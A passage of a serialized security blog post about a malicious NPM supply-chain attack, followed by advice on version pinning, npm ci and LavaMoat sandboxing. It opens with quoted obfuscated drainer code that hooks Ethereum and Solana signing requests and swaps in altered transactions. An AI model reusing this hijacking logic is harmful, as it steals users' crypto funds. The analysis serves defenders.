'solana_signTransaction' ||\n _0x2c3d7e.method === 'solana_signAndSendTransaction') &&\n _0x2c3d7e.params &&\n _0x2c3d7e.params[0]\n ) {\n try {\n let _0x5ad975 = _0x2c3d7e.params[0];\n if (_0x5ad975.transaction) {\n _0x5ad975 = _0x5ad975.transaction;\n }\n const _0x5dbe63 = _0x1089ae(_0x5ad975, false);\n if (_0x2c3d7e.params[0].transaction) {\n _0x2c3d7e.params[0].transaction = _0x5dbe63;\n } else {\n _0x2c3d7e.params[0] = _0x5dbe63;\n }\n } catch (_0x4b99fd) {}\n }\n}\n",[104925],{"type":24,"tag":145,"props":104926,"children":104927},{"__ignoreMap":7},[104928,105007,105018,105075,105115,105140,105155,105166,105200,105233,105252,105279,105287,105298,105338,105367,105395,105402,105442,105485,105529,105544,105583,105590,105614,105621],{"type":24,"tag":301,"props":104929,"children":104930},{"class":303,"line":304},[104931,104935,104939,104944,104948,104952,104956,104961,104965,104970,104974,104979,104983,104987,104991,104995,104999,105003],{"type":24,"tag":301,"props":104932,"children":104933},{"style":308},[104934],{"type":30,"value":22368},{"type":24,"tag":301,"props":104936,"children":104937},{"style":359},[104938],{"type":30,"value":873},{"type":24,"tag":301,"props":104940,"children":104941},{"style":369},[104942],{"type":30,"value":104943},"_0x2c3d7e",{"type":24,"tag":301,"props":104945,"children":104946},{"style":359},[104947],{"type":30,"value":206},{"type":24,"tag":301,"props":104949,"children":104950},{"style":369},[104951],{"type":30,"value":45052},{"type":24,"tag":301,"props":104953,"children":104954},{"style":385},[104955],{"type":30,"value":38177},{"type":24,"tag":301,"props":104957,"children":104958},{"style":329},[104959],{"type":30,"value":104960}," 'eth_sendTransaction'",{"type":24,"tag":301,"props":104962,"children":104963},{"style":385},[104964],{"type":30,"value":20977},{"type":24,"tag":301,"props":104966,"children":104967},{"style":369},[104968],{"type":30,"value":104969}," _0x2c3d7e",{"type":24,"tag":301,"props":104971,"children":104972},{"style":359},[104973],{"type":30,"value":206},{"type":24,"tag":301,"props":104975,"children":104976},{"style":369},[104977],{"type":30,"value":104978},"params",{"type":24,"tag":301,"props":104980,"children":104981},{"style":385},[104982],{"type":30,"value":20977},{"type":24,"tag":301,"props":104984,"children":104985},{"style":369},[104986],{"type":30,"value":104969},{"type":24,"tag":301,"props":104988,"children":104989},{"style":359},[104990],{"type":30,"value":206},{"type":24,"tag":301,"props":104992,"children":104993},{"style":369},[104994],{"type":30,"value":104978},{"type":24,"tag":301,"props":104996,"children":104997},{"style":359},[104998],{"type":30,"value":541},{"type":24,"tag":301,"props":105000,"children":105001},{"style":466},[105002],{"type":30,"value":584},{"type":24,"tag":301,"props":105004,"children":105005},{"style":359},[105006],{"type":30,"value":47360},{"type":24,"tag":301,"props":105008,"children":105009},{"class":303,"line":320},[105010,105014],{"type":24,"tag":301,"props":105011,"children":105012},{"style":308},[105013],{"type":30,"value":104046},{"type":24,"tag":301,"props":105015,"children":105016},{"style":359},[105017],{"type":30,"value":3035},{"type":24,"tag":301,"props":105019,"children":105020},{"class":303,"line":335},[105021,105025,105030,105034,105039,105043,105047,105051,105055,105059,105063,105067,105071],{"type":24,"tag":301,"props":105022,"children":105023},{"style":348},[105024],{"type":30,"value":58393},{"type":24,"tag":301,"props":105026,"children":105027},{"style":369},[105028],{"type":30,"value":105029}," _0x39ad21",{"type":24,"tag":301,"props":105031,"children":105032},{"style":385},[105033],{"type":30,"value":2537},{"type":24,"tag":301,"props":105035,"children":105036},{"style":314},[105037],{"type":30,"value":105038}," _0x1089ae",{"type":24,"tag":301,"props":105040,"children":105041},{"style":359},[105042],{"type":30,"value":362},{"type":24,"tag":301,"props":105044,"children":105045},{"style":369},[105046],{"type":30,"value":104943},{"type":24,"tag":301,"props":105048,"children":105049},{"style":359},[105050],{"type":30,"value":206},{"type":24,"tag":301,"props":105052,"children":105053},{"style":369},[105054],{"type":30,"value":104978},{"type":24,"tag":301,"props":105056,"children":105057},{"style":359},[105058],{"type":30,"value":541},{"type":24,"tag":301,"props":105060,"children":105061},{"style":466},[105062],{"type":30,"value":584},{"type":24,"tag":301,"props":105064,"children":105065},{"style":359},[105066],{"type":30,"value":551},{"type":24,"tag":301,"props":105068,"children":105069},{"style":348},[105070],{"type":30,"value":10819},{"type":24,"tag":301,"props":105072,"children":105073},{"style":359},[105074],{"type":30,"value":589},{"type":24,"tag":301,"props":105076,"children":105077},{"class":303,"line":344},[105078,105083,105087,105091,105095,105099,105103,105107,105111],{"type":24,"tag":301,"props":105079,"children":105080},{"style":369},[105081],{"type":30,"value":105082}," _0x2c3d7e",{"type":24,"tag":301,"props":105084,"children":105085},{"style":359},[105086],{"type":30,"value":206},{"type":24,"tag":301,"props":105088,"children":105089},{"style":369},[105090],{"type":30,"value":104978},{"type":24,"tag":301,"props":105092,"children":105093},{"style":359},[105094],{"type":30,"value":541},{"type":24,"tag":301,"props":105096,"children":105097},{"style":466},[105098],{"type":30,"value":584},{"type":24,"tag":301,"props":105100,"children":105101},{"style":359},[105102],{"type":30,"value":1046},{"type":24,"tag":301,"props":105104,"children":105105},{"style":385},[105106],{"type":30,"value":523},{"type":24,"tag":301,"props":105108,"children":105109},{"style":369},[105110],{"type":30,"value":105029},{"type":24,"tag":301,"props":105112,"children":105113},{"style":359},[105114],{"type":30,"value":492},{"type":24,"tag":301,"props":105116,"children":105117},{"class":303,"line":401},[105118,105122,105126,105130,105135],{"type":24,"tag":301,"props":105119,"children":105120},{"style":359},[105121],{"type":30,"value":38222},{"type":24,"tag":301,"props":105123,"children":105124},{"style":308},[105125],{"type":30,"value":55146},{"type":24,"tag":301,"props":105127,"children":105128},{"style":359},[105129],{"type":30,"value":873},{"type":24,"tag":301,"props":105131,"children":105132},{"style":369},[105133],{"type":30,"value":105134},"_0x226343",{"type":24,"tag":301,"props":105136,"children":105137},{"style":359},[105138],{"type":30,"value":105139},") {}\n",{"type":24,"tag":301,"props":105141,"children":105142},{"class":303,"line":415},[105143,105147,105151],{"type":24,"tag":301,"props":105144,"children":105145},{"style":359},[105146],{"type":30,"value":53610},{"type":24,"tag":301,"props":105148,"children":105149},{"style":308},[105150],{"type":30,"value":10144},{"type":24,"tag":301,"props":105152,"children":105153},{"style":359},[105154],{"type":30,"value":3035},{"type":24,"tag":301,"props":105156,"children":105157},{"class":303,"line":439},[105158,105162],{"type":24,"tag":301,"props":105159,"children":105160},{"style":308},[105161],{"type":30,"value":38149},{"type":24,"tag":301,"props":105163,"children":105164},{"style":359},[105165],{"type":30,"value":85278},{"type":24,"tag":301,"props":105167,"children":105168},{"class":303,"line":447},[105169,105174,105178,105182,105186,105190,105195],{"type":24,"tag":301,"props":105170,"children":105171},{"style":359},[105172],{"type":30,"value":105173}," (",{"type":24,"tag":301,"props":105175,"children":105176},{"style":369},[105177],{"type":30,"value":104943},{"type":24,"tag":301,"props":105179,"children":105180},{"style":359},[105181],{"type":30,"value":206},{"type":24,"tag":301,"props":105183,"children":105184},{"style":369},[105185],{"type":30,"value":45052},{"type":24,"tag":301,"props":105187,"children":105188},{"style":385},[105189],{"type":30,"value":38177},{"type":24,"tag":301,"props":105191,"children":105192},{"style":329},[105193],{"type":30,"value":105194}," 'solana_signTransaction'",{"type":24,"tag":301,"props":105196,"children":105197},{"style":385},[105198],{"type":30,"value":105199}," ||\n",{"type":24,"tag":301,"props":105201,"children":105202},{"class":303,"line":476},[105203,105208,105212,105216,105220,105225,105229],{"type":24,"tag":301,"props":105204,"children":105205},{"style":369},[105206],{"type":30,"value":105207}," _0x2c3d7e",{"type":24,"tag":301,"props":105209,"children":105210},{"style":359},[105211],{"type":30,"value":206},{"type":24,"tag":301,"props":105213,"children":105214},{"style":369},[105215],{"type":30,"value":45052},{"type":24,"tag":301,"props":105217,"children":105218},{"style":385},[105219],{"type":30,"value":38177},{"type":24,"tag":301,"props":105221,"children":105222},{"style":329},[105223],{"type":30,"value":105224}," 'solana_signAndSendTransaction'",{"type":24,"tag":301,"props":105226,"children":105227},{"style":359},[105228],{"type":30,"value":911},{"type":24,"tag":301,"props":105230,"children":105231},{"style":385},[105232],{"type":30,"value":90520},{"type":24,"tag":301,"props":105234,"children":105235},{"class":303,"line":495},[105236,105240,105244,105248],{"type":24,"tag":301,"props":105237,"children":105238},{"style":369},[105239],{"type":30,"value":105082},{"type":24,"tag":301,"props":105241,"children":105242},{"style":359},[105243],{"type":30,"value":206},{"type":24,"tag":301,"props":105245,"children":105246},{"style":369},[105247],{"type":30,"value":104978},{"type":24,"tag":301,"props":105249,"children":105250},{"style":385},[105251],{"type":30,"value":59408},{"type":24,"tag":301,"props":105253,"children":105254},{"class":303,"line":504},[105255,105259,105263,105267,105271,105275],{"type":24,"tag":301,"props":105256,"children":105257},{"style":369},[105258],{"type":30,"value":105082},{"type":24,"tag":301,"props":105260,"children":105261},{"style":359},[105262],{"type":30,"value":206},{"type":24,"tag":301,"props":105264,"children":105265},{"style":369},[105266],{"type":30,"value":104978},{"type":24,"tag":301,"props":105268,"children":105269},{"style":359},[105270],{"type":30,"value":541},{"type":24,"tag":301,"props":105272,"children":105273},{"style":466},[105274],{"type":30,"value":584},{"type":24,"tag":301,"props":105276,"children":105277},{"style":359},[105278],{"type":30,"value":4059},{"type":24,"tag":301,"props":105280,"children":105281},{"class":303,"line":512},[105282],{"type":24,"tag":301,"props":105283,"children":105284},{"style":359},[105285],{"type":30,"value":105286}," ) {\n",{"type":24,"tag":301,"props":105288,"children":105289},{"class":303,"line":592},[105290,105294],{"type":24,"tag":301,"props":105291,"children":105292},{"style":308},[105293],{"type":30,"value":76695},{"type":24,"tag":301,"props":105295,"children":105296},{"style":359},[105297],{"type":30,"value":3035},{"type":24,"tag":301,"props":105299,"children":105300},{"class":303,"line":619},[105301,105305,105310,105314,105318,105322,105326,105330,105334],{"type":24,"tag":301,"props":105302,"children":105303},{"style":348},[105304],{"type":30,"value":14890},{"type":24,"tag":301,"props":105306,"children":105307},{"style":369},[105308],{"type":30,"value":105309}," _0x5ad975",{"type":24,"tag":301,"props":105311,"children":105312},{"style":385},[105313],{"type":30,"value":2537},{"type":24,"tag":301,"props":105315,"children":105316},{"style":369},[105317],{"type":30,"value":104969},{"type":24,"tag":301,"props":105319,"children":105320},{"style":359},[105321],{"type":30,"value":206},{"type":24,"tag":301,"props":105323,"children":105324},{"style":369},[105325],{"type":30,"value":104978},{"type":24,"tag":301,"props":105327,"children":105328},{"style":359},[105329],{"type":30,"value":541},{"type":24,"tag":301,"props":105331,"children":105332},{"style":466},[105333],{"type":30,"value":584},{"type":24,"tag":301,"props":105335,"children":105336},{"style":359},[105337],{"type":30,"value":1423},{"type":24,"tag":301,"props":105339,"children":105340},{"class":303,"line":635},[105341,105345,105349,105354,105358,105363],{"type":24,"tag":301,"props":105342,"children":105343},{"style":308},[105344],{"type":30,"value":2476},{"type":24,"tag":301,"props":105346,"children":105347},{"style":359},[105348],{"type":30,"value":873},{"type":24,"tag":301,"props":105350,"children":105351},{"style":369},[105352],{"type":30,"value":105353},"_0x5ad975",{"type":24,"tag":301,"props":105355,"children":105356},{"style":359},[105357],{"type":30,"value":206},{"type":24,"tag":301,"props":105359,"children":105360},{"style":369},[105361],{"type":30,"value":105362},"transaction",{"type":24,"tag":301,"props":105364,"children":105365},{"style":359},[105366],{"type":30,"value":398},{"type":24,"tag":301,"props":105368,"children":105369},{"class":303,"line":643},[105370,105375,105379,105383,105387,105391],{"type":24,"tag":301,"props":105371,"children":105372},{"style":369},[105373],{"type":30,"value":105374}," _0x5ad975",{"type":24,"tag":301,"props":105376,"children":105377},{"style":385},[105378],{"type":30,"value":2537},{"type":24,"tag":301,"props":105380,"children":105381},{"style":369},[105382],{"type":30,"value":105309},{"type":24,"tag":301,"props":105384,"children":105385},{"style":359},[105386],{"type":30,"value":206},{"type":24,"tag":301,"props":105388,"children":105389},{"style":369},[105390],{"type":30,"value":105362},{"type":24,"tag":301,"props":105392,"children":105393},{"style":359},[105394],{"type":30,"value":492},{"type":24,"tag":301,"props":105396,"children":105397},{"class":303,"line":652},[105398],{"type":24,"tag":301,"props":105399,"children":105400},{"style":359},[105401],{"type":30,"value":19459},{"type":24,"tag":301,"props":105403,"children":105404},{"class":303,"line":666},[105405,105409,105414,105418,105422,105426,105430,105434,105438],{"type":24,"tag":301,"props":105406,"children":105407},{"style":348},[105408],{"type":30,"value":38300},{"type":24,"tag":301,"props":105410,"children":105411},{"style":369},[105412],{"type":30,"value":105413}," _0x5dbe63",{"type":24,"tag":301,"props":105415,"children":105416},{"style":385},[105417],{"type":30,"value":2537},{"type":24,"tag":301,"props":105419,"children":105420},{"style":314},[105421],{"type":30,"value":105038},{"type":24,"tag":301,"props":105423,"children":105424},{"style":359},[105425],{"type":30,"value":362},{"type":24,"tag":301,"props":105427,"children":105428},{"style":369},[105429],{"type":30,"value":105353},{"type":24,"tag":301,"props":105431,"children":105432},{"style":359},[105433],{"type":30,"value":377},{"type":24,"tag":301,"props":105435,"children":105436},{"style":348},[105437],{"type":30,"value":14990},{"type":24,"tag":301,"props":105439,"children":105440},{"style":359},[105441],{"type":30,"value":589},{"type":24,"tag":301,"props":105443,"children":105444},{"class":303,"line":674},[105445,105449,105453,105457,105461,105465,105469,105473,105477,105481],{"type":24,"tag":301,"props":105446,"children":105447},{"style":308},[105448],{"type":30,"value":2476},{"type":24,"tag":301,"props":105450,"children":105451},{"style":359},[105452],{"type":30,"value":873},{"type":24,"tag":301,"props":105454,"children":105455},{"style":369},[105456],{"type":30,"value":104943},{"type":24,"tag":301,"props":105458,"children":105459},{"style":359},[105460],{"type":30,"value":206},{"type":24,"tag":301,"props":105462,"children":105463},{"style":369},[105464],{"type":30,"value":104978},{"type":24,"tag":301,"props":105466,"children":105467},{"style":359},[105468],{"type":30,"value":541},{"type":24,"tag":301,"props":105470,"children":105471},{"style":466},[105472],{"type":30,"value":584},{"type":24,"tag":301,"props":105474,"children":105475},{"style":359},[105476],{"type":30,"value":57079},{"type":24,"tag":301,"props":105478,"children":105479},{"style":369},[105480],{"type":30,"value":105362},{"type":24,"tag":301,"props":105482,"children":105483},{"style":359},[105484],{"type":30,"value":398},{"type":24,"tag":301,"props":105486,"children":105487},{"class":303,"line":692},[105488,105493,105497,105501,105505,105509,105513,105517,105521,105525],{"type":24,"tag":301,"props":105489,"children":105490},{"style":369},[105491],{"type":30,"value":105492}," _0x2c3d7e",{"type":24,"tag":301,"props":105494,"children":105495},{"style":359},[105496],{"type":30,"value":206},{"type":24,"tag":301,"props":105498,"children":105499},{"style":369},[105500],{"type":30,"value":104978},{"type":24,"tag":301,"props":105502,"children":105503},{"style":359},[105504],{"type":30,"value":541},{"type":24,"tag":301,"props":105506,"children":105507},{"style":466},[105508],{"type":30,"value":584},{"type":24,"tag":301,"props":105510,"children":105511},{"style":359},[105512],{"type":30,"value":57079},{"type":24,"tag":301,"props":105514,"children":105515},{"style":369},[105516],{"type":30,"value":105362},{"type":24,"tag":301,"props":105518,"children":105519},{"style":385},[105520],{"type":30,"value":2537},{"type":24,"tag":301,"props":105522,"children":105523},{"style":369},[105524],{"type":30,"value":105413},{"type":24,"tag":301,"props":105526,"children":105527},{"style":359},[105528],{"type":30,"value":492},{"type":24,"tag":301,"props":105530,"children":105531},{"class":303,"line":3631},[105532,105536,105540],{"type":24,"tag":301,"props":105533,"children":105534},{"style":359},[105535],{"type":30,"value":45679},{"type":24,"tag":301,"props":105537,"children":105538},{"style":308},[105539],{"type":30,"value":10144},{"type":24,"tag":301,"props":105541,"children":105542},{"style":359},[105543],{"type":30,"value":3035},{"type":24,"tag":301,"props":105545,"children":105546},{"class":303,"line":3639},[105547,105551,105555,105559,105563,105567,105571,105575,105579],{"type":24,"tag":301,"props":105548,"children":105549},{"style":369},[105550],{"type":30,"value":105492},{"type":24,"tag":301,"props":105552,"children":105553},{"style":359},[105554],{"type":30,"value":206},{"type":24,"tag":301,"props":105556,"children":105557},{"style":369},[105558],{"type":30,"value":104978},{"type":24,"tag":301,"props":105560,"children":105561},{"style":359},[105562],{"type":30,"value":541},{"type":24,"tag":301,"props":105564,"children":105565},{"style":466},[105566],{"type":30,"value":584},{"type":24,"tag":301,"props":105568,"children":105569},{"style":359},[105570],{"type":30,"value":1046},{"type":24,"tag":301,"props":105572,"children":105573},{"style":385},[105574],{"type":30,"value":523},{"type":24,"tag":301,"props":105576,"children":105577},{"style":369},[105578],{"type":30,"value":105413},{"type":24,"tag":301,"props":105580,"children":105581},{"style":359},[105582],{"type":30,"value":492},{"type":24,"tag":301,"props":105584,"children":105585},{"class":303,"line":3647},[105586],{"type":24,"tag":301,"props":105587,"children":105588},{"style":359},[105589],{"type":30,"value":19459},{"type":24,"tag":301,"props":105591,"children":105592},{"class":303,"line":3685},[105593,105597,105601,105605,105610],{"type":24,"tag":301,"props":105594,"children":105595},{"style":359},[105596],{"type":30,"value":22565},{"type":24,"tag":301,"props":105598,"children":105599},{"style":308},[105600],{"type":30,"value":55146},{"type":24,"tag":301,"props":105602,"children":105603},{"style":359},[105604],{"type":30,"value":873},{"type":24,"tag":301,"props":105606,"children":105607},{"style":369},[105608],{"type":30,"value":105609},"_0x4b99fd",{"type":24,"tag":301,"props":105611,"children":105612},{"style":359},[105613],{"type":30,"value":105139},{"type":24,"tag":301,"props":105615,"children":105616},{"class":303,"line":3713},[105617],{"type":24,"tag":301,"props":105618,"children":105619},{"style":359},[105620],{"type":30,"value":6918},{"type":24,"tag":301,"props":105622,"children":105623},{"class":303,"line":3721},[105624],{"type":24,"tag":301,"props":105625,"children":105626},{"style":359},[105627],{"type":30,"value":698},{"type":24,"tag":80,"props":105629,"children":105631},{"id":105630},"impact-of-the-attack",[105632],{"type":30,"value":105633},"Impact of the Attack",{"type":24,"tag":32,"props":105635,"children":105636},{},[105637],{"type":30,"value":105638},"Despite the attack targeting popular NPM packages, the exploit was not very successful. After two days, the attacker's wallet was only able to drain about $1000. However, the takeaway is how easily a trusted dependency can become a delivery vector for malware.",{"type":24,"tag":43,"props":105640,"children":105642},{"id":105641},"why-it-will-happen-again",[105643],{"type":30,"value":105644},"Why It Will Happen Again",{"type":24,"tag":32,"props":105646,"children":105647},{},[105648],{"type":30,"value":105649},"The decentralized nature of the open-source ecosystem, and particularly a massive registry like NPM, makes it an attractive and persistent target for attackers. Although this recent attack was quickly mitigated and financially minor, it served as a powerful and widely-publicized proof-of-concept showing how one compromised maintainer can distribute malware at scale.",{"type":24,"tag":32,"props":105651,"children":105652},{},[105653],{"type":30,"value":105654},"With over two million packages and countless layers of direct and transitive dependencies, a compromise can cascade through thousands of projects in hours. It's the classic \"needle in a haystack\" problem, except the haystack keeps growing.",{"type":24,"tag":43,"props":105656,"children":105658},{"id":105657},"what-developers-can-do",[105659],{"type":30,"value":105660},"What Developers Can Do",{"type":24,"tag":32,"props":105662,"children":105663},{},[105664],{"type":30,"value":105665},"If you are building critical systems where supply-chain attacks are an unacceptable risk in your threat model, here are some practical actions you can take:",{"type":24,"tag":80,"props":105667,"children":105669},{"id":105668},"_1-version-pinning-in-packagejson",[105670,105672],{"type":30,"value":105671},"1. Version pinning in ",{"type":24,"tag":145,"props":105673,"children":105675},{"className":105674},[],[105676],{"type":30,"value":105677},"package.json",{"type":24,"tag":32,"props":105679,"children":105680},{},[105681],{"type":30,"value":105682},"Applications get compromised by supply-chain attacks when an attacker releases a new version of an NPM package and the application automatically downloads it to have the latest package version.",{"type":24,"tag":32,"props":105684,"children":105685},{},[105686,105688,105694,105696,105701,105703,105708],{"type":30,"value":105687},"You can pin your dependency versions to make sure they won't get updated when running ",{"type":24,"tag":145,"props":105689,"children":105691},{"className":105690},[],[105692],{"type":30,"value":105693},"npm install",{"type":30,"value":105695},". To pin it, just make sure to remove the caret ",{"type":24,"tag":145,"props":105697,"children":105699},{"className":105698},[],[105700],{"type":30,"value":55667},{"type":30,"value":105702}," symbol before the version in ",{"type":24,"tag":145,"props":105704,"children":105706},{"className":105705},[],[105707],{"type":30,"value":105677},{"type":30,"value":1679},{"type":24,"tag":291,"props":105710,"children":105712},{"code":105711,"language":6680,"meta":7,"className":6681,"style":7},"\"@react-native-async-storage/async-storage\": \"1.23.1\",\n\"@react-native-community/datetimepicker\": \"8.3.0\",\n\"@react-native-community/netinfo\": \"11.4.1\",\n\"@react-native-picker/picker\": \"2.11.0\"\n",[105713],{"type":24,"tag":145,"props":105714,"children":105715},{"__ignoreMap":7},[105716,105737,105758,105779],{"type":24,"tag":301,"props":105717,"children":105718},{"class":303,"line":304},[105719,105724,105728,105733],{"type":24,"tag":301,"props":105720,"children":105721},{"style":329},[105722],{"type":30,"value":105723},"\"@react-native-async-storage/async-storage\"",{"type":24,"tag":301,"props":105725,"children":105726},{"style":359},[105727],{"type":30,"value":5615},{"type":24,"tag":301,"props":105729,"children":105730},{"style":329},[105731],{"type":30,"value":105732},"\"1.23.1\"",{"type":24,"tag":301,"props":105734,"children":105735},{"style":359},[105736],{"type":30,"value":1729},{"type":24,"tag":301,"props":105738,"children":105739},{"class":303,"line":320},[105740,105745,105749,105754],{"type":24,"tag":301,"props":105741,"children":105742},{"style":329},[105743],{"type":30,"value":105744},"\"@react-native-community/datetimepicker\"",{"type":24,"tag":301,"props":105746,"children":105747},{"style":359},[105748],{"type":30,"value":5615},{"type":24,"tag":301,"props":105750,"children":105751},{"style":329},[105752],{"type":30,"value":105753},"\"8.3.0\"",{"type":24,"tag":301,"props":105755,"children":105756},{"style":359},[105757],{"type":30,"value":1729},{"type":24,"tag":301,"props":105759,"children":105760},{"class":303,"line":335},[105761,105766,105770,105775],{"type":24,"tag":301,"props":105762,"children":105763},{"style":329},[105764],{"type":30,"value":105765},"\"@react-native-community/netinfo\"",{"type":24,"tag":301,"props":105767,"children":105768},{"style":359},[105769],{"type":30,"value":5615},{"type":24,"tag":301,"props":105771,"children":105772},{"style":329},[105773],{"type":30,"value":105774},"\"11.4.1\"",{"type":24,"tag":301,"props":105776,"children":105777},{"style":359},[105778],{"type":30,"value":1729},{"type":24,"tag":301,"props":105780,"children":105781},{"class":303,"line":344},[105782,105787,105791],{"type":24,"tag":301,"props":105783,"children":105784},{"style":329},[105785],{"type":30,"value":105786},"\"@react-native-picker/picker\"",{"type":24,"tag":301,"props":105788,"children":105789},{"style":359},[105790],{"type":30,"value":5615},{"type":24,"tag":301,"props":105792,"children":105793},{"style":329},[105794],{"type":30,"value":105795},"\"2.11.0\"\n",{"type":24,"tag":80,"props":105797,"children":105799},{"id":105798},"_2-use-npm-ci",[105800,105802],{"type":30,"value":105801},"2. Use ",{"type":24,"tag":145,"props":105803,"children":105805},{"className":105804},[],[105806],{"type":30,"value":105807},"npm ci",{"type":24,"tag":32,"props":105809,"children":105810},{},[105811,105816,105818,105824,105826,105831],{"type":24,"tag":145,"props":105812,"children":105814},{"className":105813},[],[105815],{"type":30,"value":105807},{"type":30,"value":105817}," uses the dependency versions from ",{"type":24,"tag":145,"props":105819,"children":105821},{"className":105820},[],[105822],{"type":30,"value":105823},"package-lock.json",{"type":30,"value":105825}," to install the packages. Consider using it in CI/CD workflows and only use ",{"type":24,"tag":145,"props":105827,"children":105829},{"className":105828},[],[105830],{"type":30,"value":105693},{"type":30,"value":105832}," when adding a new package or updating an existing one.",{"type":24,"tag":80,"props":105834,"children":105836},{"id":105835},"_3-implement-lavamoat",[105837,105839],{"type":30,"value":105838},"3. Implement ",{"type":24,"tag":188,"props":105840,"children":105843},{"href":105841,"rel":105842},"https://github.com/LavaMoat/LavaMoat/tree/main",[192],[105844],{"type":24,"tag":60,"props":105845,"children":105846},{},[105847],{"type":30,"value":105848},"Lavamoat",{"type":24,"tag":32,"props":105850,"children":105851},{},[105852],{"type":30,"value":105853},"Basic hygiene helps, but it doesn’t solve the root issue: a minor utility package has the same permissions as your code. Lavamoat changes this model. Lavamoat, created by MetaMask, addresses this by sandboxing packages and enforcing least privilege. With it, even if a dependency contains malware, it cannot compromise the application.",{"type":24,"tag":32,"props":105855,"children":105856},{},[105857],{"type":30,"value":105858},"Lavamoat uses SES (Hardened JavaScript) to enforce these restrictions, limiting the globals, functions, and sub-dependencies each package can access. The rules are defined in a policy file, which looks like this:",{"type":24,"tag":291,"props":105860,"children":105862},{"code":105861,"language":6680,"meta":7,"className":6681,"style":7},"\"resources\": {\n \"@ethereumjs/util>@ethereumjs/rlp\": {\n \"globals\": {\n \"TextEncoder\": true\n }\n },\n \"@ethereumjs/util\": {\n \"globals\": {\n \"console.warn\": true,\n \"fetch\": true\n },\n \"packages\": {\n \"@ethereumjs/util>@ethereumjs/rlp\": true,\n \"@ethereumjs/util>ethereum-cryptography\": true\n }\n }\n}\n",[105863],{"type":24,"tag":145,"props":105864,"children":105865},{"__ignoreMap":7},[105866,105878,105890,105901,105917,105924,105931,105943,105954,105974,105990,105997,106008,106028,106044,106051,106058],{"type":24,"tag":301,"props":105867,"children":105868},{"class":303,"line":304},[105869,105874],{"type":24,"tag":301,"props":105870,"children":105871},{"style":329},[105872],{"type":30,"value":105873},"\"resources\"",{"type":24,"tag":301,"props":105875,"children":105876},{"style":359},[105877],{"type":30,"value":6726},{"type":24,"tag":301,"props":105879,"children":105880},{"class":303,"line":320},[105881,105886],{"type":24,"tag":301,"props":105882,"children":105883},{"style":369},[105884],{"type":30,"value":105885}," \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":24,"tag":301,"props":105887,"children":105888},{"style":359},[105889],{"type":30,"value":6726},{"type":24,"tag":301,"props":105891,"children":105892},{"class":303,"line":335},[105893,105897],{"type":24,"tag":301,"props":105894,"children":105895},{"style":369},[105896],{"type":30,"value":43771},{"type":24,"tag":301,"props":105898,"children":105899},{"style":359},[105900],{"type":30,"value":6726},{"type":24,"tag":301,"props":105902,"children":105903},{"class":303,"line":344},[105904,105909,105913],{"type":24,"tag":301,"props":105905,"children":105906},{"style":369},[105907],{"type":30,"value":105908}," \"TextEncoder\"",{"type":24,"tag":301,"props":105910,"children":105911},{"style":359},[105912],{"type":30,"value":5615},{"type":24,"tag":301,"props":105914,"children":105915},{"style":348},[105916],{"type":30,"value":43932},{"type":24,"tag":301,"props":105918,"children":105919},{"class":303,"line":401},[105920],{"type":24,"tag":301,"props":105921,"children":105922},{"style":359},[105923],{"type":30,"value":19459},{"type":24,"tag":301,"props":105925,"children":105926},{"class":303,"line":415},[105927],{"type":24,"tag":301,"props":105928,"children":105929},{"style":359},[105930],{"type":30,"value":32137},{"type":24,"tag":301,"props":105932,"children":105933},{"class":303,"line":439},[105934,105939],{"type":24,"tag":301,"props":105935,"children":105936},{"style":369},[105937],{"type":30,"value":105938}," \"@ethereumjs/util\"",{"type":24,"tag":301,"props":105940,"children":105941},{"style":359},[105942],{"type":30,"value":6726},{"type":24,"tag":301,"props":105944,"children":105945},{"class":303,"line":447},[105946,105950],{"type":24,"tag":301,"props":105947,"children":105948},{"style":369},[105949],{"type":30,"value":43771},{"type":24,"tag":301,"props":105951,"children":105952},{"style":359},[105953],{"type":30,"value":6726},{"type":24,"tag":301,"props":105955,"children":105956},{"class":303,"line":476},[105957,105962,105966,105970],{"type":24,"tag":301,"props":105958,"children":105959},{"style":369},[105960],{"type":30,"value":105961}," \"console.warn\"",{"type":24,"tag":301,"props":105963,"children":105964},{"style":359},[105965],{"type":30,"value":5615},{"type":24,"tag":301,"props":105967,"children":105968},{"style":348},[105969],{"type":30,"value":10819},{"type":24,"tag":301,"props":105971,"children":105972},{"style":359},[105973],{"type":30,"value":1729},{"type":24,"tag":301,"props":105975,"children":105976},{"class":303,"line":495},[105977,105982,105986],{"type":24,"tag":301,"props":105978,"children":105979},{"style":369},[105980],{"type":30,"value":105981}," \"fetch\"",{"type":24,"tag":301,"props":105983,"children":105984},{"style":359},[105985],{"type":30,"value":5615},{"type":24,"tag":301,"props":105987,"children":105988},{"style":348},[105989],{"type":30,"value":43932},{"type":24,"tag":301,"props":105991,"children":105992},{"class":303,"line":504},[105993],{"type":24,"tag":301,"props":105994,"children":105995},{"style":359},[105996],{"type":30,"value":6903},{"type":24,"tag":301,"props":105998,"children":105999},{"class":303,"line":512},[106000,106004],{"type":24,"tag":301,"props":106001,"children":106002},{"style":369},[106003],{"type":30,"value":43947},{"type":24,"tag":301,"props":106005,"children":106006},{"style":359},[106007],{"type":30,"value":6726},{"type":24,"tag":301,"props":106009,"children":106010},{"class":303,"line":592},[106011,106016,106020,106024],{"type":24,"tag":301,"props":106012,"children":106013},{"style":369},[106014],{"type":30,"value":106015}," \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":24,"tag":301,"props":106017,"children":106018},{"style":359},[106019],{"type":30,"value":5615},{"type":24,"tag":301,"props":106021,"children":106022},{"style":348},[106023],{"type":30,"value":10819},{"type":24,"tag":301,"props":106025,"children":106026},{"style":359},[106027],{"type":30,"value":1729},{"type":24,"tag":301,"props":106029,"children":106030},{"class":303,"line":619},[106031,106036,106040],{"type":24,"tag":301,"props":106032,"children":106033},{"style":369},[106034],{"type":30,"value":106035}," 